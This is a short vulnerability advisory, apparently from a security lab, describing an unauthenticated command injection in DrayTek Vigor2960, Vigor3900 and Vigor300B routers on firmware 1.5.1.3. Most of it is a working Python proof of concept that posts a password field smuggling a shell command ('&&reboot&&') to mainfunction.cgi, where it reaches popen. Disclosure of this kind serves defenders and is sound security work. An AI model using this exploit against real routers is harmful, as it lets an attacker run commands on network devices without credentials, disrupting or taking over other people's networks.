draytek-vigor-1513-cmdi-vuln.md

Affected devices

Vigor2960, Vigor3900, Vigor300B

Affected firmware version

1.5.1.3

Founder

C0ss4ck @ Bytedance Wuheng Lab

Submit-time

2021-07-21

CVSS Score

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H, 9.0

PoC

from sys import argv
from base64 import b64encode
import requests

data = {
  "URL": "192.168.1.1",
  "HOST": "http://192.168.1.1",
  "action": "authuser",
  "formusername": b64encode(b"admin").decode(),
  "formpassword": b64encode(b"admin'&&reboot&&echo '").decode(),
  "PHONENUMBER": argv[1]
}
header = {
  "Content-Type": "application/raw"
}
url = {
  "root": "http://192.168.1.1:80",
  "cgi": {
    "root": "/cgi-bin",
    "uri": {
      "mf": "/mainfunction.cgi",
    }
  }
}

def build_url(p1, p2=None):
  if p2:
    return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
  else:
    return url["root"] + url[p1]
   
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)

Details

• Location: mainfunction.cgi
• Flow: 0x2c7f4(authuser action callback) => run_command => popen

Fix

DrayTek should publish a new firmware